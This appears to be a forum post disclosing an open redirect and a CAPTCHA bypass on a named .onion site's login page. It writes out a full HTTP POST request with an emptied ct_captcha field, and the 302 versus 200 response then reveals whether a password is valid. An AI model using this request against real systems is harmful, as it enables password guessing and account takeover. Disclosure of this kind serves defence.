Basically, http://darkheroesq46awl.onion/login suffers from 2 vulnerabilities:
- Arbitrary URL Redirect
- CAPTCHA Bypass (CWE-203: Information Exposure Through Discrepancy)
The "Arbitrary URL Redirect" affects the POST parameter redirect_to. An attacker can use this to trick you into visiting a phishing site, or worse, deanonymize you.
Regarding "CAPTCHA Bypass" the CAPTCHA parameter in the login POST request is "ct_captcha". If you unset this (NULL value) or simply delete it, then you will get the "302" redirect if and only if the credentials are correct. Below is an example of a request that triggers this vulnerability:
POST /login HTTP/1.1
Host: darkheroesq46awl.onion
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://darkheroesq46awl.onion/register?i=
Cookie: PHPSESSID=a
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
redirect_to=https://www.example.com&username=USERNAME&password=PASSWORD&ct_captcha=&submit=Login+Now
Notice that "ct_captcha" has a null value. When USERNAME and PASSWORD equal a valid pair for an existing user, the HTTP response code is "302". When the pair are invalid (like you guessed a wrong password), the response code is "200".
Using this, it is possible to compromise accounts with shitty passwords very easily.
Be safe,
Your friendly DN Security Consultant.
How is this not upvoted massively?
Thank you for taking the time to contribute this my friend.